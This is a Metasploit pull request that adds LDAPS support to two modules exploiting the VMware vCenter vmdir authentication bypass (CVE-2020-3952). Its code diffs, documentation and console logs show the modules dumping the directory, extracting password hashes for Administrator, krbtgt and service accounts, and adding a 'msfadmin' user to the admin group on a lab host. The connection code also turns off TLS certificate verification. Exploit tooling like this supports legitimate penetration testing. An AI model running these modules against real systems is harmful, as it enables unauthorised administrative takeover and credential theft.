### PR TITLE
Add LDAPS support and update VMware vCenter Server vmdir (CVE-2020-3952) modules

### DIFF
--- a/documentation/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.md
+++ b/documentation/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.md
@@ -51,8 +51,8 @@ Module options (auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass):
    BASE_DN                    no        LDAP base DN if you already have it
    PASSWORD                   no        Password of admin user to add
    RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
-   RPORT     389              yes       The target port
-   SSL       false            no        Enable SSL on the LDAP connection
+   RPORT     636              yes       The target port
+   SSL       true             no        Enable SSL on the LDAP connection
    USERNAME                   no        Username of admin user to add
 
 
@@ -86,8 +86,8 @@ supportedldapversion: 3
 supportedsaslmechanisms: GSSAPI
 
 [+] Discovered base DN: dc=vsphere,dc=local
-[*] Dumping LDAP data from vmdir service at [redacted]:389
-[+] [redacted]:389 is vulnerable to CVE-2020-3952
+[*] Dumping LDAP data from vmdir service at [redacted]:636
+[+] [redacted]:636 is vulnerable to CVE-2020-3952
 [*] Storing LDAP data in loot
 [+] Saved LDAP data to /Users/wvu/.msf4/loot/20200417002255_default_[redacted]_VMwarevCenterS_975097.txt
 [*] Password and lockout policy:
@@ -107,7 +107,7 @@ vmwpasswordprohibitedpreviouscount: [redacted]
 
 [+] Credentials found: [redacted]
 [snip]
-[*] Bypassing LDAP auth in vmdir service at [redacted]:389
+[*] Bypassing LDAP auth in vmdir service at [redacted]:636
 [*] Adding admin user msfadmin with password msfadmin
 [+] Added user msfadmin, so auth bypass was successful!
 [+] Added user msfadmin to admin group

--- a/documentation/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.md
+++ b/documentation/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.md
@@ -71,6 +71,7 @@ msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > set password msfad
 password => msfadmin
 msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > run
 [*] Running module against [redacted]
+not verifying SSL hostname of LDAPS server '[redacted]:636'
 
 [*] Using auxiliary/gather/vmware_vcenter_vmdir_ldap as check
 [*] Discovering base DN automatically

--- a/documentation/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.md
+++ b/documentation/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.md
@@ -36,11 +36,6 @@ Set this to the username for the new admin user.
 
 Set this to the password for the new admin user.
 
-### ConnectTimeout
-
-You may configure the timeout for LDAP connects if necessary. The
-default is 10.0 seconds and should be more than sufficient.
-
 ## Scenarios
 
 ### VMware vCenter Server 6.7 virtual appliance on ESXi
@@ -57,6 +52,7 @@ Module options (auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass):
    PASSWORD                   no        Password of admin user to add
    RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
    RPORT     389              yes       The target port
+   SSL       false            no        Enable SSL on the LDAP connection
    USERNAME                   no        Username of admin user to add
 
 

--- a/documentation/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.md
+++ b/documentation/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.md
@@ -28,11 +28,6 @@ Dump all LDAP data from the vCenter Server.
 
 If you already have the LDAP base DN, you may set it in this option.
 
-### ConnectTimeout
-
-You may configure the timeout for LDAP connects if necessary. The
-default is 10.0 seconds and should be more than sufficient.
-
 ## Scenarios
 
 ### VMware vCenter Server 6.7 virtual appliance on ESXi
@@ -48,6 +43,7 @@ Module options (auxiliary/gather/vmware_vcenter_vmdir_ldap):
    BASE_DN                   no        LDAP base DN if you already have it
    RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
    RPORT    389              yes       The target port
+   SSL      false            no        Enable SSL on the LDAP connection
 
 
 Auxiliary action:

--- a/documentation/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.md
+++ b/documentation/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.md
@@ -57,6 +57,7 @@ msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) > set rhosts [redacted]
 rhosts => [redacted]
 msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) > run
 [*] Running module against [redacted]
+not verifying SSL hostname of LDAPS server '[redacted]:636'
 
 [*] Discovering base DN automatically
 [*] Searching root DSE for base DN

--- a/documentation/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.md
+++ b/documentation/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.md
@@ -42,8 +42,8 @@ Module options (auxiliary/gather/vmware_vcenter_vmdir_ldap):
    ----     ---------------  --------  -----------
    BASE_DN                   no        LDAP base DN if you already have it
    RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
-   RPORT    389              yes       The target port
-   SSL      false            no        Enable SSL on the LDAP connection
+   RPORT    636              yes       The target port
+   SSL      true             no        Enable SSL on the LDAP connection
 
 
 Auxiliary action:
@@ -71,8 +71,8 @@ supportedldapversion: 3
 supportedsaslmechanisms: GSSAPI
 
 [+] Discovered base DN: dc=vsphere,dc=local
-[*] Dumping LDAP data from vmdir service at [redacted]:389
-[+] [redacted]:389 is vulnerable to CVE-2020-3952
+[*] Dumping LDAP data from vmdir service at [redacted]:636
+[+] [redacted]:636 is vulnerable to CVE-2020-3952
 [*] Storing LDAP data in loot
 [+] Saved LDAP data to /Users/wvu/.msf4/loot/20200417002613_default_[redacted]_VMwarevCenterS_939568.txt
 [*] Password and lockout policy:

--- a/lib/msf/core/exploit/ldap.rb
+++ b/lib/msf/core/exploit/ldap.rb
@@ -43,7 +43,12 @@ module Exploit::Remote::LDAP
     }
 
     if datastore['SSL']
-      connect_opts[:encryption] = { method: :simple_tls }
+      connect_opts[:encryption] = {
+        method: :simple_tls,
+        tls_options: {
+          verify_mode: OpenSSL::SSL::VERIFY_NONE
+        }
+      }
     end
 
     Net::LDAP.open(connect_opts.merge(opts), &block)

--- a/lib/msf/core/exploit/ldap.rb
+++ b/lib/msf/core/exploit/ldap.rb
@@ -14,7 +14,12 @@ module Exploit::Remote::LDAP
 
     register_options([
       Opt::RHOST,
-      Opt::RPORT(389)
+      Opt::RPORT(389),
+      OptBool.new('SSL', [false, 'Enable SSL on the LDAP connection', false])
+    ])
+
+    register_advanced_options([
+      OptFloat.new('ConnectTimeout', [true, 'Timeout for LDAP connect', 10.0])
     ])
   end
 
@@ -28,6 +33,20 @@ module Exploit::Remote::LDAP
 
   def peer
     "#{rhost}:#{rport}"
+  end
+
+  def ldap_connect(opts = {}, &block)
+    connect_opts = {
+      host: rhost,
+      port: rport,
+      connect_timeout: datastore['ConnectTimeout']
+    }
+
+    if datastore['SSL']
+      connect_opts[:encryption] = { method: :simple_tls }
+    end
+
+    Net::LDAP.open(connect_opts.merge(opts), &block)
   end
 
   def discover_base_dn(ldap)

--- a/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.rb
+++ b/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.rb
@@ -37,6 +37,7 @@ class MetasploitModule < Msf::Auxiliary
         ],
         'DefaultAction' => 'Add',
         'DefaultOptions' => {
+          'SSL' => true,
           'CheckModule' => 'auxiliary/gather/vmware_vcenter_vmdir_ldap'
         },
         'Notes' => {
@@ -47,6 +48,7 @@ class MetasploitModule < Msf::Auxiliary
     )
 
     register_options([
+      Opt::RPORT(636), # SSL/TLS
       OptString.new('BASE_DN', [false, 'LDAP base DN if you already have it']),
       OptString.new('USERNAME', [false, 'Username of admin user to add']),
       OptString.new('PASSWORD', [false, 'Password of admin user to add'])

--- a/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.rb
+++ b/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.rb
@@ -51,10 +51,6 @@ class MetasploitModule < Msf::Auxiliary
       OptString.new('USERNAME', [false, 'Username of admin user to add']),
       OptString.new('PASSWORD', [false, 'Password of admin user to add'])
     ])
-
-    register_advanced_options([
-      OptFloat.new('ConnectTimeout', [true, 'Timeout for LDAP connect', 10.0])
-    ])
   end
 
   def username
@@ -95,13 +91,7 @@ class MetasploitModule < Msf::Auxiliary
       @base_dn = checkcode.reason
     end
 
-    opts = {
-      host: rhost,
-      port: rport,
-      connect_timeout: datastore['ConnectTimeout']
-    }
-
-    Net::LDAP.open(opts) do |ldap|
+    ldap_connect do |ldap|
       print_status("Bypassing LDAP auth in vmdir service at #{peer}")
       auth_bypass(ldap)
 

--- a/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.rb
+++ b/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.rb
@@ -35,6 +35,9 @@ class MetasploitModule < Msf::Auxiliary
           ['Dump', 'Description' => 'Dump all LDAP data']
         ],
         'DefaultAction' => 'Dump',
+        'DefaultOptions' => {
+          'SSL' => true
+        },
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'SideEffects' => [IOC_IN_LOGS]
@@ -43,6 +46,7 @@ class MetasploitModule < Msf::Auxiliary
     )
 
     register_options([
+      Opt::RPORT(636), # SSL/TLS
       OptString.new('BASE_DN', [false, 'LDAP base DN if you already have it'])
     ])
   end

--- a/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.rb
+++ b/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.rb
@@ -45,10 +45,6 @@ class MetasploitModule < Msf::Auxiliary
     register_options([
       OptString.new('BASE_DN', [false, 'LDAP base DN if you already have it'])
     ])
-
-    register_advanced_options([
-      OptFloat.new('ConnectTimeout', [false, 'Timeout for LDAP connect', 10.0])
-    ])
   end
 
   def base_dn
@@ -67,15 +63,9 @@ class MetasploitModule < Msf::Auxiliary
   # Dump data using discovered base DN:
   #   ldapsearch -xb dc=vsphere,dc=local -H ldap://[redacted] \* + -
   def run
-    opts = {
-      host: rhost,
-      port: rport,
-      connect_timeout: datastore['ConnectTimeout']
-    }
-
     entries = nil
 
-    Net::LDAP.open(opts) do |ldap|
+    ldap_connect do |ldap|
       if (@base_dn = datastore['BASE_DN'])
         print_status("User-specified base DN: #{base_dn}")
       else


### PR DESCRIPTION
## New usage

```
msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) > options

Module options (auxiliary/gather/vmware_vcenter_vmdir_ldap):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   BASE_DN                   no        LDAP base DN if you already have it
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    636              yes       The target port
   SSL      true             no        Enable SSL on the LDAP connection


Auxiliary action:

   Name  Description
   ----  -----------
   Dump  Dump all LDAP data


msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) > set rhosts 172.16.249.180
rhosts => 172.16.249.180
msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) > run
[*] Running module against 172.16.249.180
not verifying SSL hostname of LDAPS server '172.16.249.180:636'

[*] Discovering base DN automatically
[*] Searching root DSE for base DN
dn: cn=DSE Root
namingcontexts: dc=vsphere,dc=local
supportedcontrol: 1.3.6.1.4.1.4203.1.9.1.1
supportedcontrol: 1.3.6.1.4.1.4203.1.9.1.2
supportedcontrol: 1.3.6.1.4.1.4203.1.9.1.3
supportedcontrol: 1.2.840.113556.1.4.417
supportedcontrol: 1.2.840.113556.1.4.319
supportedldapversion: 3
supportedsaslmechanisms: GSSAPI SRP

[+] Discovered base DN: dc=vsphere,dc=local
[*] Dumping LDAP data from vmdir service at 172.16.249.180:636
[+] 172.16.249.180:636 is vulnerable to CVE-2020-3952
[*] Storing LDAP data in loot
[+] Saved LDAP data to /Users/wvu/.msf4/loot/20200722154803_default_172.16.249.180_VMwarevCenterS_133094.txt
[*] Password and lockout policy:
vmwpasswordchangeautounlockintervalsec: 300
vmwpasswordchangefailedattemptintervalsec: 180
vmwpasswordchangemaxfailedattempts: 5
vmwpasswordlifetimedays: 90
vmwpasswordmaxidenticaladjacentchars: 3
vmwpasswordmaxlength: 20
vmwpasswordminalphabeticcount: 2
vmwpasswordminlength: 8
vmwpasswordminlowercasecount: 1
vmwpasswordminnumericcount: 1
vmwpasswordminspecialcharcount: 1
vmwpasswordminuppercasecount: 1
vmwpasswordprohibitedpreviouscount: 5

[+] Credentials found: cn=172.16.249.181,ou=Domain Controllers,dc=vsphere,dc=local:$dynamic_82$f965612c9e7a933ab29e5649198681a590e6f689489f0ec8a7f02b84178dc4822a4fd1e923b82e72de27b8af1f6269edef56314fe3018b7530fbc7cb006b30b4$HEX$904749a39d743b51289a91c66318cd44
[+] Credentials found: CN=waiter 1280c7ae-54de-40ef-9f45-e0005f728a37,cn=users,dc=vsphere,dc=local:$dynamic_82$d63e652caff428d790aa43f0e64f2b8ec379a0e1fceae19e9b6b5630c80cac622642bfea79b63cf40789966704694be3e06d981b55a63cbf8ee846b849d21444$HEX$303685149ef9187ce55dd87814ba8b07
[+] Credentials found: cn=krbtgt/VSPHERE.LOCAL,cn=users,dc=VSPHERE,dc=LOCAL:$dynamic_82$2a45521e1e1e841e0428284feff5c255b8e5875e3b7211d2ec007ad91926f63e5328a99621539d5597ec38b9b803ba63325db7020c3ef80f2fadf2fc112fdf2a$HEX$fac06133e25961f07ac1adac692afde3
[+] Credentials found: cn=K/M,cn=users,dc=VSPHERE,dc=LOCAL:$dynamic_82$0135323a1b2cbd1cb79bd45a140db7a0cab4bee8ce5cb080ec795547d0dc05f48fc1413731d79165c505db73177a0cf4d6346f77a425d20857b7369111945dc8$HEX$f31d0df9bd02a52d0e48186976272752
[+] Credentials found: cn=Administrator,cn=Users,dc=vsphere,dc=local:$dynamic_82$f7999ac5694f9b9b92e3bf2bd99efe4acc79e32c20a701ab71ec05bfa4e6825b2f3cee55cf34fa3f4ee46bdc1f67d3bcc2a85071201a74571ac3e2c6cb69bae8$HEX$98d0351edf12b19cc7c104767888db82
[+] Credentials found: cn=vmca/172.16.249.181@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$6a2edcc59e4dd8a3ff170cbd7903fdcafa21d0894e4d7c6f78fd3298043fe3b7eb7174f6bdcaadef42223b12fe710dd338a07d8377425b5ef7103131a571855c$HEX$25e806f17d47978722e6eec5104e2d2a
[+] Credentials found: cn=ldap/172.16.249.181@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$74c82584d9a51f521879cffc3c6f92ee1146a7c450035f2bb54262dd43f9c89f40877d30cb222e3574e4aac63529899c4a1d0e910856f0b2eaa14e6ebd95df03$HEX$585ea764ad045883d0beb00a90cdb75a
[+] Credentials found: cn=host/172.16.249.181@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$cc5aff442e3efd0b0635862f3ac0c8cc09ad19b3a2bad3e85c304988842c9c9d0f06fea03667204526422fda8eb21ad32b021cabf763d041a185026995bdfa7a$HEX$c8fd96ee1399c2886ef02817e30c3b92
[*] Auxiliary module execution completed
msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) > set ssl false
[!] Changing the SSL option's value may require changing RPORT!
ssl => false
msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) >
```

## Protocol analysis before

```
    1   0.000000 172.16.249.1 → 172.16.249.180 59752 389 TCP 78 59752 → 389 [SYN, ECN, CWR] Seq=0 Win=65535 Len=0 MSS=1460 WS=64 TSval=1009398662 TSecr=0 SACK_PERM=1
    2   0.000242 172.16.249.180 → 172.16.249.1 389 59752 TCP 66 389 → 59752 [SYN, ACK] Seq=0 Ack=1 Win=29200 Len=0 MSS=1460 SACK_PERM=1 WS=256
    3   0.000289 172.16.249.1 → 172.16.249.180 59752 389 TCP 54 59752 → 389 [ACK] Seq=1 Ack=1 Win=262144 Len=0
    4   0.000401 172.16.249.1 → 172.16.249.180 59752 389 LDAP 68 bindRequest(1) "<ROOT>" simple
    5   0.000521 172.16.249.180 → 172.16.249.1 389 59752 TCP 54 389 → 59752 [ACK] Seq=1 Ack=15 Win=29440 Len=0
    6   0.000760 172.16.249.180 → 172.16.249.1 389 59752 LDAP 68 bindResponse(1) success
    7   0.000803 172.16.249.1 → 172.16.249.180 59752 389 TCP 54 59752 → 389 [ACK] Seq=15 Ack=15 Win=262080 Len=0
    8   0.001912 172.16.249.1 → 172.16.249.180 59752 389 LDAP 250 searchRequest(2) "<ROOT>" baseObject
    9   0.002178 172.16.249.180 → 172.16.249.1 389 59752 LDAP 342 searchResEntry(2) "cn=DSE Root"
   10   0.002206 172.16.249.1 → 172.16.249.180 59752 389 TCP 54 59752 → 389 [ACK] Seq=211 Ack=303 Win=261824 Len=0
   11   0.002272 172.16.249.180 → 172.16.249.1 389 59752 LDAP 68 searchResDone(2) success  [1 result]
   12   0.002287 172.16.249.1 → 172.16.249.180 59752 389 TCP 54 59752 → 389 [ACK] Seq=211 Ack=317 Win=262080 Len=0
   13   0.003638 172.16.249.1 → 172.16.249.180 59752 389 LDAP 250 searchRequest(3) "<ROOT>" baseObject
   14   0.003978 172.16.249.180 → 172.16.249.1 389 59752 LDAP 342 searchResEntry(3) "cn=DSE Root"
   15   0.004007 172.16.249.1 → 172.16.249.180 59752 389 TCP 54 59752 → 389 [ACK] Seq=407 Ack=605 Win=261824 Len=0
   16   0.004088 172.16.249.180 → 172.16.249.1 389 59752 LDAP 68 searchResDone(3) success  [2 results]
   17   0.004103 172.16.249.1 → 172.16.249.180 59752 389 TCP 54 59752 → 389 [ACK] Seq=407 Ack=619 Win=262080 Len=0
   18   0.004462 172.16.249.1 → 172.16.249.180 59752 389 LDAP 161 searchRequest(4) "dc=vsphere,dc=local" wholeSubtree
   19   0.042886 172.16.249.180 → 172.16.249.1 389 59752 TCP 54 389 → 59752 [ACK] Seq=619 Ack=514 Win=31488 Len=0
   20   0.138479 172.16.249.180 → 172.16.249.1 389 59752 LDAP 105 searchResDone(4) success  [2 results]
   21   0.138553 172.16.249.1 → 172.16.249.180 59752 389 TCP 54 59752 → 389 [ACK] Seq=514 Ack=670 Win=262080 Len=0
   22   0.299848 172.16.249.1 → 172.16.249.180 59752 389 TCP 54 59752 → 389 [FIN, ACK] Seq=514 Ack=670 Win=262144 Len=0
   23   0.300165 172.16.249.180 → 172.16.249.1 389 59752 TCP 54 389 → 59752 [FIN, ACK] Seq=670 Ack=515 Win=31488 Len=0
   24   0.300208 172.16.249.1 → 172.16.249.180 59752 389 TCP 54 59752 → 389 [ACK] Seq=515 Ack=671 Win=262144 Len=0
```

## Protocol analysis after

```
    1   0.000000 172.16.249.1 → 172.16.249.180 59744 636 TCP 78 59744 → 636 [SYN, ECN, CWR] Seq=0 Win=65535 Len=0 MSS=1460 WS=64 TSval=1009322796 TSecr=0 SACK_PERM=1
    2   0.000297 172.16.249.180 → 172.16.249.1 636 59744 TCP 66 636 → 59744 [SYN, ACK] Seq=0 Ack=1 Win=29200 Len=0 MSS=1460 SACK_PERM=1 WS=256
    3   0.000332 172.16.249.1 → 172.16.249.180 59744 636 TCP 54 59744 → 636 [ACK] Seq=1 Ack=1 Win=262144 Len=0
    4   0.000856 172.16.249.1 → 172.16.249.180 59744 636 TLSv1 571 Client Hello
    5   0.001125 172.16.249.180 → 172.16.249.1 636 59744 TCP 54 636 → 59744 [ACK] Seq=1 Ack=518 Win=30464 Len=0
    6   0.001979 172.16.249.180 → 172.16.249.1 636 59744 TLSv1.2 1479 Server Hello, Certificate, Server Key Exchange, Server Hello Done
    7   0.002000 172.16.249.1 → 172.16.249.180 59744 636 TCP 54 59744 → 636 [ACK] Seq=518 Ack=1426 Win=260672 Len=0
    8   0.003100 172.16.249.1 → 172.16.249.180 59744 636 TLSv1.2 180 Client Key Exchange, Change Cipher Spec, Encrypted Handshake Message
    9   0.003692 172.16.249.180 → 172.16.249.1 636 59744 TLSv1.2 280 New Session Ticket, Change Cipher Spec, Encrypted Handshake Message
   10   0.003752 172.16.249.1 → 172.16.249.180 59744 636 TCP 54 59744 → 636 [ACK] Seq=644 Ack=1652 Win=261888 Len=0
   11   0.004384 172.16.249.1 → 172.16.249.180 59744 636 TLSv1.2 97 Application Data
   12   0.004674 172.16.249.180 → 172.16.249.1 636 59744 TLSv1.2 97 Application Data
   13   0.004724 172.16.249.1 → 172.16.249.180 59744 636 TCP 54 59744 → 636 [ACK] Seq=687 Ack=1695 Win=262080 Len=0
   14   0.005982 172.16.249.1 → 172.16.249.180 59744 636 TLSv1.2 279 Application Data
   15   0.006479 172.16.249.180 → 172.16.249.1 636 59744 TLSv1.2 371 Application Data
   16   0.006543 172.16.249.1 → 172.16.249.180 59744 636 TCP 54 59744 → 636 [ACK] Seq=912 Ack=2012 Win=261824 Len=0
   17   0.006831 172.16.249.180 → 172.16.249.1 636 59744 TLSv1.2 97 Application Data
   18   0.006913 172.16.249.1 → 172.16.249.180 59744 636 TCP 54 59744 → 636 [ACK] Seq=912 Ack=2055 Win=262080 Len=0
   19   0.008389 172.16.249.1 → 172.16.249.180 59744 636 TLSv1.2 279 Application Data
   20   0.008791 172.16.249.180 → 172.16.249.1 636 59744 TLSv1.2 371 Application Data
   21   0.008848 172.16.249.1 → 172.16.249.180 59744 636 TCP 54 59744 → 636 [ACK] Seq=1137 Ack=2372 Win=261824 Len=0
   22   0.008911 172.16.249.180 → 172.16.249.1 636 59744 TLSv1.2 97 Application Data
   23   0.008928 172.16.249.1 → 172.16.249.180 59744 636 TCP 54 59744 → 636 [ACK] Seq=1137 Ack=2415 Win=262080 Len=0
   24   0.009254 172.16.249.1 → 172.16.249.180 59744 636 TLSv1.2 190 Application Data
   25   0.048272 172.16.249.180 → 172.16.249.1 636 59744 TCP 54 636 → 59744 [ACK] Seq=2415 Ack=1273 Win=33536 Len=0
   26   0.305272 172.16.249.180 → 172.16.249.1 636 59744 TLSv1.2 134 Application Data
   27   0.305308 172.16.249.1 → 172.16.249.180 59744 636 TCP 54 59744 → 636 [ACK] Seq=1273 Ack=2495 Win=262016 Len=0
   28   0.475215 172.16.249.1 → 172.16.249.180 59744 636 TLSv1.2 85 Encrypted Alert
   29   0.475241 172.16.249.1 → 172.16.249.180 59744 636 TCP 54 59744 → 636 [FIN, ACK] Seq=1304 Ack=2495 Win=262144 Len=0
   30   0.475553 172.16.249.180 → 172.16.249.1 636 59744 TCP 54 636 → 59744 [ACK] Seq=2495 Ack=1304 Win=33536 Len=0
   31   0.475680 172.16.249.180 → 172.16.249.1 636 59744 TLSv1.2 85 Encrypted Alert
   32   0.475707 172.16.249.1 → 172.16.249.180 59744 636 TCP 54 59744 → 636 [RST] Seq=1305 Win=0 Len=0
   33   0.475760 172.16.249.180 → 172.16.249.1 636 59744 TCP 54 636 → 59744 [FIN, ACK] Seq=2526 Ack=1305 Win=33536 Len=0
   34   0.475770 172.16.249.1 → 172.16.249.180 59744 636 TCP 54 59744 → 636 [RST] Seq=1305 Win=0 Len=0
```

Updates #13253 and #13868.